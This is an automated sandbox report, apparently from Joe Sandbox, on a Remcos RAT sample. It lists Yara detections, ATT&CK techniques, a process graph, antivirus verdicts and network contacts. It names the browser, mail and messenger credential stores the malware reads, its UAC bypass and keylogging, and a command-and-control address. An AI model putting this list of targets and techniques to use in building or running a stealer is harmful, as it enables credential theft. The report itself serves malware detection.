                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package0516~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                Source: C:\Windows\SysWOW64\dxdiag.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package0110~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeQueries volume information: C:\ VolumeInformation
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exeCode function: 5_2_00434020 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,5_2_00434020
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exeCode function: 5_2_0041A7B2 GetUserNameW,5_2_0041A7B2
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exeCode function: 5_2_00448067 _free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,5_2_00448067
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeCode function: 38_2_0041739B GetVersionExW,38_2_0041739B
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                Stealing of Sensitive Information

                barindex
                Yara detected Remcos RAT
                Source: Yara matchFile source: 0.2.iGhDjzEiDU.exe.43c65b8.3.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.2.iGhDjzEiDU.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.2.iGhDjzEiDU.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.iGhDjzEiDU.exe.424d978.4.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.iGhDjzEiDU.exe.43c65b8.3.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.iGhDjzEiDU.exe.4309f98.5.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.iGhDjzEiDU.exe.424d978.4.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000005.00000002.1682584731.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.1688374211.0000000004149000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.1688374211.0000000004185000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: iGhDjzEiDU.exe PID: 6984, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: iGhDjzEiDU.exe PID: 2992, type: MEMORYSTR
                Source: Yara matchFile source: C:\ProgramData\graias\logs.dat, type: DROPPED
                Contains functionality to steal Chrome passwords or cookies
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exeCode function: \AppData\Local\Google\Chrome\User Data\Default\Login Data5_2_0040B21B
                Contains functionality to steal Firefox passwords or cookies
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exeCode function: \AppData\Roaming\Mozilla\Firefox\Profiles\5_2_0040B335
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exeCode function: \key3.db5_2_0040B335
                Tries to harvest and steal browser information (history, passwords, etc)
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\key4.db
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                Tries to steal Instant Messenger accounts or passwords
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeKey opened: HKEY_CURRENT_USER\Software\Google\Google Talk\Accounts
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\IdentityCRL\Dynamic Salt
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\IdentityCRL\Dynamic Salt
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeKey opened: HKEY_CURRENT_USER\Software\Google\Google Talk\Accounts
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeKey opened: HKEY_CURRENT_USER\Software\Paltalk
                Tries to steal Mail credentials (via file / registry access)
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows Live Mail
                Tries to steal Mail credentials (via file registry)
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeCode function: ESMTPPassword39_2_004033F0
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeCode function: _mbscpy,_mbscpy,_mbscpy,_mbscpy,RegCloseKey, PopPassword39_2_00402DB3
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeCode function: _mbscpy,_mbscpy,_mbscpy,_mbscpy,RegCloseKey, SMTPPassword39_2_00402DB3
                Yara detected WebBrowserPassView password recovery tool
                Source: Yara matchFile source: Process Memory Space: graias.exe PID: 7468, type: MEMORYSTR

                Remote Access Functionality

                barindex
                Detected Remcos RAT
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exeMutex created: \Sessions\1\BaseNamedObjects\Rmc-O844B9Jump to behavior
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeMutex created: \Sessions\1\BaseNamedObjects\Rmc-O844B9
                Yara detected Remcos RAT
                Source: Yara matchFile source: 0.2.iGhDjzEiDU.exe.43c65b8.3.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.2.iGhDjzEiDU.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.2.iGhDjzEiDU.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.iGhDjzEiDU.exe.424d978.4.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.iGhDjzEiDU.exe.43c65b8.3.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.iGhDjzEiDU.exe.4309f98.5.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.iGhDjzEiDU.exe.424d978.4.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000005.00000002.1682584731.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.1688374211.0000000004149000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.1688374211.0000000004185000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: iGhDjzEiDU.exe PID: 6984, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: iGhDjzEiDU.exe PID: 2992, type: MEMORYSTR
                Source: Yara matchFile source: C:\ProgramData\graias\logs.dat, type: DROPPED
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exeCode function: cmd.exe5_2_00405042

                Mitre Att&ck Matrix

                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity Information11
                Scripting                		Valid Accounts231
                Windows Management Instrumentation                		11
                Scripting                		1
                LSASS Driver                		11
                Disable or Modify Tools                		2
                OS Credential Dumping                		2
                System Time Discovery                		Remote Services11
                Archive Collected Data                		12
                Ingress Tool Transfer                		Exfiltration Over Other Network Medium1
                System Shutdown/Reboot
                CredentialsDomainsDefault Accounts21
                Native API                		1
                LSASS Driver                		1
                DLL Side-Loading                		1
                Deobfuscate/Decode Files or Information                		221
                Input Capture                		1
                Account Discovery                		Remote Desktop Protocol1
                Data from Local System                		21
                Encrypted Channel                		Exfiltration Over Bluetooth1
                Defacement
                Email AddressesDNS ServerDomain Accounts12
                Command and Scripting Interpreter                		1
                DLL Side-Loading                		1
                Bypass User Account Control                		3
                Obfuscated Files or Information                		2
                Credentials in Registry                		1
                System Service Discovery                		SMB/Windows Admin Shares1
                Email Collection                		1
                Non-Standard Port                		Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal Accounts2
                Service Execution                		1
                Windows Service                		1
                Access Token Manipulation                		12
                Software Packing                		3
                Credentials In Files                		4
                File and Directory Discovery                		Distributed Component Object Model221
                Input Capture                		1
                Remote Access Software                		Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchd11
                Registry Run Keys / Startup Folder                		1
                Windows Service                		1
                DLL Side-Loading                		LSA Secrets159
                System Information Discovery                		SSH3
                Clipboard Data                		2
                Non-Application Layer Protocol                		Scheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC Scripts322
                Process Injection                		1
                Bypass User Account Control                		Cached Domain Credentials451
                Security Software Discovery                		VNCGUI Input Capture13
                Application Layer Protocol                		Data Transfer Size LimitsService Stop
                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup Items11
                Registry Run Keys / Startup Folder                		1
                Masquerading                		DCSync251
                Virtualization/Sandbox Evasion                		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job251
                Virtualization/Sandbox Evasion                		Proc Filesystem4
                Process Discovery                		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
                Access Token Manipulation                		/etc/passwd and /etc/shadow1
                Application Window Discovery                		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron322
                Process Injection                		Network Sniffing1
                System Owner/User Discovery                		Shared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement

                Behavior Graph

                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet
                behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1583975 Sample: iGhDjzEiDU.exe Startdate: 04/01/2025 Architecture: WINDOWS Score: 100 99 shed.dual-low.s-part-0017.t-0009.t-msedge.net 2->99 101 s-part-0017.t-0009.t-msedge.net 2->101 103 geoplugin.net 2->103 109 Suricata IDS alerts for network traffic 2->109 111 Found malware configuration 2->111 113 Malicious sample detected (through community Yara rule) 2->113 115 17 other signatures 2->115 12 iGhDjzEiDU.exe 4 2->12         started        16 mstee.sys 2->16         started        18 mskssrv.sys 2->18         started        signatures3 process4 file5 87 C:\Users\user\AppData\...\iGhDjzEiDU.exe.log, ASCII 12->87 dropped 155 Contains functionality to bypass UAC (CMSTPLUA) 12->155 157 Contains functionalty to change the wallpaper 12->157 159 Contains functionality to steal Chrome passwords or cookies 12->159 161 5 other signatures 12->161 20 iGhDjzEiDU.exe 1 4 12->20         started        24 powershell.exe 23 12->24         started        26 iGhDjzEiDU.exe 12->26         started        signatures6 process7 file8 83 C:\Users\user\AppData\Roaming\...\graias.exe, PE32 20->83 dropped 85 C:\Users\user\...\graias.exe:Zone.Identifier, ASCII 20->85 dropped 127 Detected Remcos RAT 20->127 129 Creates autostart registry keys with suspicious names 20->129 28 graias.exe 4 20->28         started        131 Loading BitLocker PowerShell Module 24->131 31 conhost.exe 24->31         started        signatures9 process10 signatures11 147 Antivirus detection for dropped file 28->147 149 Multi AV Scanner detection for dropped file 28->149 151 Tries to steal Mail credentials (via file registry) 28->151 153 3 other signatures 28->153 33 graias.exe 28->33         started        38 powershell.exe 23 28->38         started        40 chrome.exe 28->40         started        process12 dnsIp13 95 185.234.72.215, 4444, 49733, 49737 COMBAHTONcombahtonGmbHDE United Kingdom 33->95 97 geoplugin.net 178.237.33.50, 49735, 80 ATOM86-ASATOM86NL Netherlands 33->97 79 C:\...\xyepttayrhgkznkxmawzcpzmosukc.vbs, data 33->79 dropped 81 C:\ProgramData\graias\logs.dat, data 33->81 dropped 117 Detected Remcos RAT 33->117 119 Writes to foreign memory regions 33->119 121 Maps a DLL or memory area into another process 33->121 123 Installs a global keyboard hook 33->123 42 dxdiag.exe 33->42         started        45 graias.exe 33->45         started        47 graias.exe 33->47         started        53 14 other processes 33->53 125 Loading BitLocker PowerShell Module 38->125 49 conhost.exe 38->49         started        51 WmiPrvSE.exe 38->51         started        file14 signatures15 process16 signatures17 133 Query firmware table information (likely to detect VMs) 42->133 135 Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines) 42->135 137 Queries sensitive service information (via WMI, Win32_LogicalDisk, often done to detect sandboxes) 42->137 139 Installs a global keyboard hook 42->139 141 Tries to steal Instant Messenger accounts or passwords 45->141 143 Tries to steal Mail credentials (via file / registry access) 45->143 145 Tries to harvest and steal browser information (history, passwords, etc) 47->145 55 chrome.exe 53->55         started        58 chrome.exe 53->58         started        60 chrome.exe 53->60         started        62 12 other processes 53->62 process18 dnsIp19 105 192.168.2.4, 138, 443, 4444 unknown unknown 55->105 107 239.255.255.250 unknown Reserved 55->107 64 chrome.exe 55->64         started        67 chrome.exe 58->67         started        69 chrome.exe 60->69         started        71 chrome.exe 62->71         started        73 chrome.exe 62->73         started        75 chrome.exe 62->75         started        77 8 other processes 62->77 process20 dnsIp21 89 s-part-0039.t-0009.t-msedge.net 13.107.246.67, 443, 49751, 49855 MICROSOFT-CORP-MSN-AS-BLOCKUS United States 64->89 91 www.google.com 142.250.185.196, 443, 49755, 50095 GOOGLEUS United States 64->91 93 8 other IPs or domains 64->93

                Screenshots

                Thumbnails

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand

                Antivirus, Machine Learning and Genetic Malware Detection

                Initial Sample

                SourceDetectionScannerLabelLink
                iGhDjzEiDU.exe71%ReversingLabsByteCode-MSIL.Backdoor.FormBook
                iGhDjzEiDU.exe100%AviraHEUR/AGEN.1309540
                iGhDjzEiDU.exe100%Joe Sandbox ML

                Dropped Files

                SourceDetectionScannerLabelLink
                C:\Users\user\AppData\Roaming\Graias\graias.exe100%AviraHEUR/AGEN.1309540
                C:\Users\user\AppData\Roaming\Graias\graias.exe100%Joe Sandbox ML
                C:\Users\user\AppData\Roaming\Graias\graias.exe71%ReversingLabsByteCode-MSIL.Backdoor.FormBook

                Unpacked PE Files

                No Antivirus matches

                Domains

                No Antivirus matches

                URLs

                SourceDetectionScannerLabelLink
                https://authoring-docs-microsoft.poolparty.biz/devrel/7696cda6-0510-47f6-8302-71bb5d2e28cf0%Avira URL Cloudsafe
                https://authoring-docs-microsoft.poolparty.biz/devrel/69c76c32-967e-4c65-b89a-74cc527db7250%Avira URL Cloudsafe

                Domains and IPs

                Contacted Domains

                NameIPActiveMaliciousAntivirus DetectionReputation
                geoplugin.net
                		178.237.33.50
                		truefalse
                  		high
                  s-part-0017.t-0009.t-msedge.net
                  		13.107.246.45
                  		truefalse
                    		high
                    www.google.com
                    		142.250.185.196
                    		truefalse
                      		high
                      s-part-0039.t-0009.t-msedge.net
                      		13.107.246.67
                      		truefalse
                        		high
                        js.monitor.azure.com
                        		unknown
                        		unknownfalse
                          		high
                          mdec.nelreports.net
                          		unknown
                          		unknownfalse
                            		high

                            Contacted URLs

                            NameMaliciousAntivirus DetectionReputation
                            https://js.monitor.azure.com/scripts/c/ms.jsll-4.min.jsfalse
                              		high
                              http://geoplugin.net/json.gpfalse
                                		high

                                URLs from Memory and Binaries

                                NameSourceMaliciousAntivirus DetectionReputation
                                https://authoring-docs-microsoft.poolparty.biz/devrel/7696cda6-0510-47f6-8302-71bb5d2e28cfchromecache_157.13.drfalse
                                • Avira URL Cloud: safe
                                		unknown
                                https://duckduckgo.com/chrome_newtabchpC919.tmp.38.drfalse
                                  		high
                                  http://www.fontbureau.com/designersGiGhDjzEiDU.exe, 00000000.00000002.1708895090.00000000071F2000.00000004.00000800.00020000.00000000.sdmpfalse
                                    		high
                                    http://www.imvu.comrgraias.exe, 00000029.00000002.2092881288.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalse
                                      		high
                                      https://duckduckgo.com/ac/?q=chpC919.tmp.38.drfalse
                                        		high
                                        http://www.fontbureau.com/designers/?iGhDjzEiDU.exe, 00000000.00000002.1708895090.00000000071F2000.00000004.00000800.00020000.00000000.sdmpfalse
                                          		high
                                          http://www.founder.com.cn/cn/bTheiGhDjzEiDU.exe, 00000000.00000002.1708895090.00000000071F2000.00000004.00000800.00020000.00000000.sdmpfalse
                                            		high
                                            http://www.fontbureau.com/designers?iGhDjzEiDU.exe, 00000000.00000002.1708895090.00000000071F2000.00000004.00000800.00020000.00000000.sdmpfalse
                                              		high
                                              https://github.com/dotnet/docs/blob/17c4acca45e573a92878a44a2cce57d699fe9c7c/docs/framework/install/chromecache_157.13.drfalse
                                                		high
                                                https://www.linkedin.com/cws/share?url=$chromecache_169.13.dr, chromecache_190.13.drfalse
                                                  		high
                                                  http://www.tiro.comiGhDjzEiDU.exe, 00000000.00000002.1708895090.00000000071F2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    		high
                                                    https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=chpC919.tmp.38.drfalse
                                                      		high
                                                      http://www.fontbureau.com/designersiGhDjzEiDU.exe, 00000000.00000002.1708895090.00000000071F2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        		high
                                                        http://www.nirsoft.netgraias.exe, 00000026.00000002.2105157332.0000000000D73000.00000004.00000010.00020000.00000000.sdmpfalse
                                                          		high
                                                          http://www.goodfont.co.kriGhDjzEiDU.exe, 00000000.00000002.1708895090.00000000071F2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            		high
                                                            https://github.com/Youssef1313chromecache_157.13.drfalse
                                                              		high
                                                              https://management.azure.com/providers/Microsoft.Portal/userSettings/cloudconsole?api-version=2023-0chromecache_169.13.dr, chromecache_190.13.drfalse
                                                                		high
                                                                https://aka.ms/msignite_docs_bannerchromecache_169.13.dr, chromecache_190.13.drfalse
                                                                  		high
                                                                  https://videoencodingpublic-hgeaeyeba8gycee3.b01.azurefd.net/public-b4da8140-92cf-421c-8b7b-e471d5b9chromecache_190.13.drfalse
                                                                    		high
                                                                    http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.comgraias.exe, 00000029.00000002.2092881288.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalse
                                                                      		high
                                                                      http://polymer.github.io/AUTHORS.txtchromecache_169.13.dr, chromecache_190.13.drfalse
                                                                        		high
                                                                        https://github.com/dotnet/docs/issues/new?template=z-customer-feedback.ymlchromecache_157.13.drfalse
                                                                          		high
                                                                          http://www.sajatypeworks.comiGhDjzEiDU.exe, 00000000.00000002.1708895090.00000000071F2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            		high
                                                                            http://www.typography.netDiGhDjzEiDU.exe, 00000000.00000002.1708895090.00000000071F2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              		high
                                                                              https://www.google.comgraias.exe, graias.exe, 00000029.00000002.2092881288.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalse
                                                                                		high
                                                                                http://www.founder.com.cn/cn/cTheiGhDjzEiDU.exe, 00000000.00000002.1708895090.00000000071F2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  		high
                                                                                  http://www.galapagosdesign.com/staff/dennis.htmiGhDjzEiDU.exe, 00000000.00000002.1708895090.00000000071F2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    		high
                                                                                    https://management.azure.com/subscriptions?api-version=2016-06-01chromecache_169.13.dr, chromecache_190.13.drfalse
                                                                                      		high
                                                                                      https://github.com/dotnet/docs/blob/main/docs/framework/install/application-not-started.mdchromecache_157.13.drfalse
                                                                                        		high
                                                                                        http://geoplugin.net/json.gp/CiGhDjzEiDU.exe, 00000000.00000002.1688374211.0000000004149000.00000004.00000800.00020000.00000000.sdmp, iGhDjzEiDU.exe, 00000000.00000002.1688374211.0000000004185000.00000004.00000800.00020000.00000000.sdmp, iGhDjzEiDU.exe, 00000005.00000002.1682584731.0000000000400000.00000040.00000400.00020000.00000000.sdmpfalse
                                                                                          		high
                                                                                          https://aka.ms/pshelpmechoosechromecache_169.13.dr, chromecache_190.13.drfalse
                                                                                            		high
                                                                                            https://aka.ms/feedback/report?space=61chromecache_157.13.dr, chromecache_191.13.drfalse
                                                                                              		high
                                                                                              https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchchpC919.tmp.38.drfalse
                                                                                                		high
                                                                                                http://www.galapagosdesign.com/DPleaseiGhDjzEiDU.exe, 00000000.00000002.1708895090.00000000071F2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                  		high
                                                                                                  https://learn-video.azurefd.net/vod/playerchromecache_169.13.dr, chromecache_190.13.drfalse
                                                                                                    		high
                                                                                                    https://login.yahoo.com/config/logingraias.exefalse
                                                                                                      		high
                                                                                                      http://www.fonts.comiGhDjzEiDU.exe, 00000000.00000002.1708895090.00000000071F2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                        		high
                                                                                                        http://www.sandoll.co.kriGhDjzEiDU.exe, 00000000.00000002.1708895090.00000000071F2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                          		high
                                                                                                          https://twitter.com/intent/tweet?original_referer=$chromecache_169.13.dr, chromecache_190.13.drfalse
                                                                                                            		high
                                                                                                            https://github.com/gewarrenchromecache_157.13.drfalse
                                                                                                              		high
                                                                                                              http://www.urwpp.deDPleaseiGhDjzEiDU.exe, 00000000.00000002.1708895090.00000000071F2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                		high
                                                                                                                http://www.nirsoft.net/graias.exe, 00000029.00000002.2092881288.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalse
                                                                                                                  		high
                                                                                                                  http://www.zhongyicts.com.cniGhDjzEiDU.exe, 00000000.00000002.1708895090.00000000071F2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                    		high
                                                                                                                    http://polymer.github.io/CONTRIBUTORS.txtchromecache_169.13.dr, chromecache_190.13.drfalse
                                                                                                                      		high
                                                                                                                      http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameiGhDjzEiDU.exe, 00000000.00000002.1684799990.0000000003141000.00000004.00000800.00020000.00000000.sdmp, graias.exe, 00000006.00000002.1717497130.0000000002BB3000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                        		high
                                                                                                                        http://www.sakkal.comiGhDjzEiDU.exe, 00000000.00000002.1708895090.00000000071F2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                          		high
                                                                                                                          https://github.com/dotnet/docs/blob/live/docs/framework/install/application-not-started.mdchromecache_157.13.drfalse
                                                                                                                            		high
                                                                                                                            http://www.apache.org/licenses/LICENSE-2.0iGhDjzEiDU.exe, 00000000.00000002.1708895090.00000000071F2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                              		high
                                                                                                                              http://www.fontbureau.comiGhDjzEiDU.exe, 00000000.00000002.1708895090.00000000071F2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                		high
                                                                                                                                https://authoring-docs-microsoft.poolparty.biz/devrel/69c76c32-967e-4c65-b89a-74cc527db725chromecache_157.13.drfalse
                                                                                                                                • Avira URL Cloud: safe
                                                                                                                                		unknown
                                                                                                                                https://client-api.arkoselabs.com/v2/api.jschromecache_169.13.dr, chromecache_190.13.drfalse
                                                                                                                                  		high
                                                                                                                                  https://aka.ms/MSIgniteChallenge/Tier1Banner?wt.mc_id=ignite24_learnbanner_tier1_cnlchromecache_169.13.dr, chromecache_190.13.drfalse
                                                                                                                                    		high
